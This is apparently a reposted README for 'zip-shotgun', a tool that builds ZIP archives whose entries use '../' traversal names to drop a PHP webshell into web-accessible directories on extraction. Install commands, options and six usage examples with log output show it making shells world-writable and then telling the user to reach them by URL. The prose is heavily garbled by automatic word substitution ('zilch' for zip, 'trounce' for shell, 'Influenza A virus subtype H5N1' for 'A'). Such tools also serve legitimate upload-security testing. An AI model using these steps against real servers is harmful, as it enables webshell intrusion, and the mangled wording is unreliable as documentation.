Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities


Utility script to exam zilch file upload functionality (and possible extraction of zilch files) for vulnerabilities. Idea for this script comes from this post service on Silent Signal Techblog - Compressed File Upload And Command Execution together with from OWASP - Test Upload of Malicious Files
This script volition practice archive which contains files amongst "../" inwards filename. When extracting this could crusade files to live on extracted to preceding directories. It tin hand the sack let assailant to extract shells to directories which tin hand the sack live on accessed from spider web browser.
Default webshell is wwwolf's PHP spider web trounce together with all the credit for it goes to WhiteWinterWolf. Source is available HERE

Installation
  1. Install using Python pip
    pip install zip-shotgun --upgrade
  2. Clone git repository together with install
    git clone https://github.com/jpiechowka/zip-shotgun.git
    Execute from root directory of the cloned repository (where setup.py file is located)
    pip install . --upgrade

Usage together with options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE  Options:   --version                       Show the version together with exit.   -c, --directories-count INTEGER                                   Count of how many directories to larn dorsum                                   within the zilch file (e.g iii agency that iii                                   files volition live on added to the zip: shell.php,                                   ../shell.php together with ../../shell.php where                                   shell.php is the refer of the trounce you lot                                   provided or randomly generated value                                   [default: 16]   -n, --shell-name TEXT           Name of the trounce within the generated zilch                                   file (e.g shell). If non provided it volition live on                                   randomly generated. Cannot convey whitespaces   -f, --shell-file-path PATH      Influenza A virus subtype H5N1 file that contains code for the shell. If                                   this selection is non provided wwwolf                                   (https://github.com/WhiteWinterWolf/wwwolf-                                   php-webshell) php trounce volition live on added                                   instead. If refer is provided it volition live on                                   added to the zilch amongst the provided refer or                                   if non provided the refer volition live on randomly                                   generated.   --compress                      Enable compression. If this flag is ready                                   archive volition live on compressed using DEFALTE                                   algorithm amongst compression flat of 9. By                                   default in that place is no compression applied.   -h, --help                      Show this message together with exit.

Examples
  1. Using all default options
    zip-shotgun archive.zip
    Part of the script output
    12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:13:13 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: BCsQOkiN23ur7OUj 12/Dec/2018 Midweek 23:13:13 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php ... 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Finished. Try to access trounce using BCsQOkiN23ur7OUj.php inwards the URL
  2. Using default options together with enabling compression for archive file
    zip-shotgun --compress archive.zip
    Part of the script output
    12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:16:13 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: 6B6NtnZXbXSubDCh 12/Dec/2018 Midweek 23:16:13 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix ... 12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | Finished. Try to access trounce using 6B6NtnZXbXSubDCh.php inwards the URL
  3. Using default options but changing the set out of directories to larn dorsum inwards the archive to 3
    zip-shotgun --directories-count iii archive.zip
    zip-shotgun -c iii archive.zip
    The script volition write iii files inwards total to the archive
    Part of the script output
    12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:17:43 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: 34Bv9YoignMHgk2F 12/Dec/2018 Midweek 23:17:43 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Finished. Try to access trounce using 34Bv9YoignMHgk2F.php inwards the URL
  4. Using default options but providing trounce refer within archive together with enabling compression
    Shell refer cannot convey whitespaces
    zip-shotgun --shell-name custom-name --compress archive.zip
    zip-shotgun -n custom-name --compress archive.zip
    Name for trounce files within the archive volition live on ready to the ane provided past times the user.
    Part of the script output
    12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:19:12 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: ../../../custom-name.php ... 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Finished. Try to access trounce using custom-name.php inwards the URL
  5. Provide custom trounce file but job random refer within archive. Set directories count to 3
    zip-shotgun --directories-count iii --shell-file-path ./custom-shell.php archive.zip
    zip-shotgun -c iii -f ./custom-shell.php archive.zip
    Shell code volition live on extracted from user provided file. Names within the archive volition live on randomly generated.
    Part of the script output
    12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:21:37 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: gqXRAJu1LD8d8VKf 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | File containing trounce code was provided: REDACTED\zip-shotgun\custom-shell.php. Content volition live on added to archive 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Getting file extension from provided trounce file for reuse: php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Opening provided file amongst trounce code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Finished. Try to access trounce using gqXRAJu1LD8d8VKf.php inwards the URL
  6. Provide custom trounce file together with ready trounce refer to relieve within archive. Set directories count to iii together with job compression
    zip-shotgun --directories-count iii --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
    zip-shotgun -c iii -n custom-name -f ./custom-shell.php --compress archive.zip
    Shell code volition live on extracted from user provided file. Names within the archive volition live on ready to user provided name.
    Part of the script output
    12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | File containing trounce code was provided: REDACTED\zip-shotgun\custom-shell.php. Content volition live on added to archive 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Getting file extension from provided trounce file for reuse: php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Opening provided file amongst trounce code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Finished. Try to access trounce using custom-name.php inwards the URL